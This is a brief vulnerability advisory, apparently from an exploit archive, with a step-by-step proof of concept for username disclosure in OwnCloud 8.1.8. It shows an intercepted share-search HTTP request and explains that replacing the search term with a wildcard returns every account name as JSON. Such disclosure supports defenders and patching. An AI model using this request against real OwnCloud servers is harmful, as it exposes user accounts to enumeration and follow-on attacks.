OwnCloud version 8.1.8 suffers from a username disclosure vulnerability.
757c36179daa923d31563d7d6f7b1f5f
OwnCloud version 8.1.8 (stable) are vulnerable to recovery all username
login list.
PoC:
1. Create an account in OwnCloud
2. Intercept connection with Burp
3. Share a file, typing anything
---------------------------------------------------------
4. Burp will capture this request
GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
requesttoken: XXXXXXXXXXXXXXXXXXX
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://domain.com/index.php/apps/files/
Cookie: XXXXXXXXXXXXXXXX
---------------------------------------------------------------------
5. Send to Repeater
6. Change GET parameter to THIS:
GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
HTTP/1.1
7. Return valeus will be a JSON with all username informations